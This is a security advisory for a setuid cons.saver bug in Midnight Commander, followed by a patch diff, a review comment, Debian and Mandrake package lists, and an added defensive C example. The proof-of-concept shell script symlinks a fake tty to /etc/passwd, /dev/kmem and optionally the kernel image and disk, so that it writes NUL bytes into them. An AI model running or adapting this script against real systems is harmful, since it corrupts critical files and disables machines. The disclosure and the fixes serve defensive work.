Vulnerability: cons.saver

Affected: cons.saver (part of the Midnight Commander package)

Description

Maurycy Prodeus found the following. Many systems have a setuid cons.saver, which is part of the Midnight Commander package; the standard location of this binary is /usr/lib/mc/bin/cons.saver. There is a bug which allows a local user to write a '\0' character into any file that can be reached through a symlink, so it can be very destructive. Maurycy wrote a simple example of a DoS.

Technical details

It isn't a common kind of bug. cons.saver doesn't check whether stdout is open. Next, it checks whether argv[1] is a terminal file: the file is first opened with the O_RDWR flag, and then it checks whether this file is a character device. When an error occurs, cons.saver doesn't close this file. Later, a NULL character is written to fd 1 (our 'fake' stdout).

Proof of concept:

#!/bin/sh
# *---------------------------------------------------------*
# Slaughterhouse ver. 1.0 by z33d@eth-security.net (C) 2000  |
# Bloody, Midnight DoS ;> with suid cons.saver
# Dedicated to my lovely mother.
# : Greetz
# * (...) Blue eyes (...)
# - y3t1 - your wish is my command :)
# - wroclaw's killers <=> dyziu, decker, kanedaa, korie, viedzmin (...)
# - argante development team (lcamtuf,bulba,artur,marcin,bikappa,honey ...)
# - #sigsegv (funkysh, y3t1, cliph, detergent, kris, venglin ...)
# - sister of night
# - other ppl like mareczek, grubszy, karol, adam, wojtas, siebylnikov,
#   sweet Asia (...)                                           |
# *---------------------------------------------------------*

if [ -u /usr/lib/mc/bin/cons.saver ]; then
    echo "Zdarza sie."
else
    echo "Swoja matke przepros ..."
    exit 0
fi

cat >/tmp/rzeznia.c <<_eof_
#include <stdio.h>
#include <unistd.h>
int main(void){
    close(0);
    close(1);
    execl("/usr/lib/mc/bin/cons.saver","cons.saver","/tmp/tty13",NULL);
    printf("To jakies fatalne nieporozumienie...\n");}
_eof_

gcc /tmp/rzeznia.c -o /tmp/rzeznia
rm -f /tmp/rzeznia.c

if [ -x /tmp/rzeznia ]; then
    echo "On naostrzyl juz noz ... mial rowek i trojkatny ksztalt"
else
    echo "ZZZZZZz Zyz yzyzyyzyzyzyzyyy y y . . ."
    exit 0
fi

ln -s /etc/passwd /tmp/tty13
/tmp/rzeznia
rm -f /tmp/tty13
ln -s /dev/kmem /tmp/tty13
/tmp/rzeznia
rm -f /tmp/tty13
# Use if needed ;>
# ln -s /boot/vmlinuz /tmp/tty13
# /tmp/rzeznia
# rm -f /tmp/tty13
# ln -s /dev/hda /tmp/tty13
# /tmp/rzeznia
echo "... "
echo " he passed away"
rm -f /tmp/rzeznia

Solution

z33d wrote a temporary patch, but Solar's Openwall patch should be enough:

--- mc-4.5.42/src/cons.saver.c	Mon Dec 6 18:50:02 1999
+++ mc-4.5.42/src/cons.saver.c.z33d	Sun Nov 12 17:20:48 2000
@@ -116,12 +116,15 @@
     if (fd == -1)
 	return -1;
-    if (fstat (fd, &stat_buf) == -1)
+    if (fstat (fd, &stat_buf) == -1){
+	close(fd);
 	return -1;
+    }
     /* Must be character device */
     if (!S_ISCHR (stat_buf.st_mode)){
 	*msg = "Not a character device";
+	close(fd);
 	return -1;
     }
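Review bot: the two new close(fd) calls do stop the descriptor leak on the fstat and S_ISCHR failure paths, but the same `close(fd); return -1;` pair is now duplicated at every early return in this function (three more copies follow in the next hunk), so the next check someone adds will silently reintroduce the leak; a single cleanup label that every failing branch jumps to (`fail: close(fd); return -1;`) removes that risk. Note also that this hunk addresses only the leak: the advisory's root cause includes cons.saver writing to fd 1 without ever checking that stdout was open, so the setuid binary should additionally make sure fds 0, 1 and 2 are open at startup (reopening /dev/null on any that are closed), which keeps a later open() from ever being handed fd 1.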
@@ -132,17 +135,20 @@
     /* Second time: must be console */
     if ((stat_buf.st_rdev & 0xff00) != 0x0400){
 	*msg = "Not a console";
+	close(fd);
 	return -1;
     }
     if ((stat_buf.st_rdev & 0x00ff) > 63){
 	*msg = "Minor device number too big";
+	close(fd);
 	return -1;
     }
     /* Must be owned by the user */
     if (stat_buf.st_uid != getuid ()){
 	*msg = "Not a owner";
+	close(fd);
 	return -1;
     }
 }

For Debian:

http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42-11.potato.5.diff.gz
http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42-11.potato.5.dsc
http://security.debian.org/dists/stable/updates/main/source/mc_4.5.42.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/gmc_4.5.42-11.potato.5_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mc-common_4.5.42-11.potato.5_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mc_4.5.42-11.potato.5_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/gmc_4.5.42-11.potato.5_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/mc-common_4.5.42-11.potato.5_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/mc_4.5.42-11.potato.5_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/gmc_4.5.42-11.potato.5_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/mc-common_4.5.42-11.potato.5_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/mc_4.5.42-11.potato.5_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/gmc_4.5.42-11.potato.5_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mc-common_4.5.42-11.potato.5_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mc_4.5.42-11.potato.5_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/gmc_4.5.42-11.potato.5_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mc-common_4.5.42-11.potato.5_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mc_4.5.42-11.potato.5_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/gmc_4.5.42-11.potato.5_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mc-common_4.5.42-11.potato.5_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mc_4.5.42-11.potato.5_sparc.deb

For Linux-Mandrake:

Linux-Mandrake 6.0:
6.0/RPMS/gmc-4.5.31-14.1mdk.i586.rpm
6.0/RPMS/mc-4.5.31-14.1mdk.i586.rpm
6.0/RPMS/mcserv-4.5.31-14.1mdk.i586.rpm
6.0/SRPMS/mc-4.5.31-14.1mdk.src.rpm

Linux-Mandrake 6.1:
6.1/RPMS/gmc-4.5.38-4.1mdk.i586.rpm
6.1/RPMS/mc-4.5.38-4.1mdk.i586.rpm
6.1/RPMS/mcserv-4.5.38-4.1mdk.i586.rpm
6.1/SRPMS/mc-4.5.38-4.1mdk.src.rpm

Linux-Mandrake 7.0:
7.0/RPMS/gmc-4.5.42-4.1mdk.i586.rpm
7.0/RPMS/mc-4.5.42-4.1mdk.i586.rpm
7.0/RPMS/mcserv-4.5.42-4.1mdk.i586.rpm
7.0/SRPMS/mc-4.5.42-4.1mdk.src.rpm

Linux-Mandrake 7.1:
7.1/RPMS/gmc-4.5.46-1.1mdk.i586.rpm
7.1/RPMS/mc-4.5.46-1.1mdk.i586.rpm
7.1/RPMS/mcserv-4.5.46-1.1mdk.i586.rpm
7.1/SRPMS/mc-4.5.46-1.1mdk.src.rpm

Linux-Mandrake 7.2:
7.2/RPMS/gmc-4.5.51-7.1mdk.i586.rpm
7.2/RPMS/mc-4.5.51-7.1mdk.i586.rpm
7.2/RPMS/mcserv-4.5.51-7.1mdk.i586.rpm
7.2/SRPMS/mc-4.5.51-7.1mdk.src.rpm
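The two defensive checks this advisory turns on, as an added example written for this page and not code from the mc project, z33d or Openwall: open_char_device() validates the opened descriptor the way the patched error paths do (fstat on the fd, then the character-device and ownership tests) but releases the descriptor through one cleanup label, and ensure_std_fds_open() supplies the startup check the advisory says cons.saver lacked, so a later open() can never be handed fd 1. The function names and the temporary-file path used by the demo are my own assumptions; the demo's input is a constructed regular file.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if fd is an open descriptor, 0 if it is closed. */
int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/* The check the advisory says cons.saver lacked: make sure 0, 1 and 2 are
 * open before doing anything else, so a later open() cannot be handed fd 1
 * and a write to "stdout" cannot reach a file chosen by the caller.
 * Returns 0 on success, -1 on error. */
int ensure_std_fds_open(void)
{
    int fd, nfd;
    for (fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {           /* open() returns the lowest free fd, so this should not happen */
            close(nfd);
            return -1;
        }
    }
    return 0;
}

/* Open `path` and verify, through the opened descriptor (fstat, so a symlink
 * target cannot be swapped after the check), that it is a character device
 * owned by the invoking user. On success returns the fd; on failure sets
 * *msg and returns -1 after closing the fd via one shared cleanup label. */
int open_char_device(const char *path, const char **msg)
{
    struct stat st;
    int fd = open(path, O_RDWR);
    if (fd == -1) {
        *msg = "open failed";
        return -1;
    }
    if (fstat(fd, &st) == -1) {
        *msg = "fstat failed";
        goto fail;
    }
    if (!S_ISCHR(st.st_mode)) {
        *msg = "Not a character device";
        goto fail;
    }
    if (st.st_uid != getuid()) {
        *msg = "Not owned by the invoking user";
        goto fail;
    }
    return fd;
fail:
    close(fd);   /* every failing branch ends here: no path can leak the descriptor */
    return -1;
}

/* Demo on constructed input: a temporary regular file (not a device) must be
 * rejected, and the rejection must not leak a descriptor. The lowest free fd
 * (what the next open() returns) is sampled before and after the call and
 * must be unchanged. Returns 1 on the expected outcome, 0 otherwise. */
int demo_regular_file_rejected_without_leak(const char **msg)
{
    char path[] = "/tmp/cons-example-XXXXXX";   /* hypothetical path, constructed for the demo */
    int before, after, fd;
    int tmp = mkstemp(path);
    if (tmp == -1)
        return 0;
    close(tmp);
    before = open("/dev/null", O_RDONLY);
    close(before);
    fd = open_char_device(path, msg);
    after = open("/dev/null", O_RDONLY);
    close(after);
    unlink(path);
    return fd == -1 && before == after;
}

int main(int argc, char **argv)
{
    const char *msg = "";
    if (ensure_std_fds_open() == -1)
        return 1;
    if (argc > 1) {                 /* check a path given on the command line */
        int fd = open_char_device(argv[1], &msg);
        if (fd == -1) {
            fprintf(stderr, "%s: %s\n", argv[1], msg);
            return 1;
        }
        close(fd);
        printf("%s: accepted\n", argv[1]);
        return 0;
    }
    printf("regular file rejected without fd leak: %s (%s)\n",
           demo_regular_file_rejected_without_leak(&msg) ? "yes" : "no", msg);
    return 0;
}
```

Run it with no arguments to see the leak check pass on a throwaway regular file, or with a path to see which test a candidate file fails. The ownership test deliberately compares against getuid() rather than geteuid(): in a setuid program the effective uid is root, and the point of the check is that the console belongs to the real invoking user.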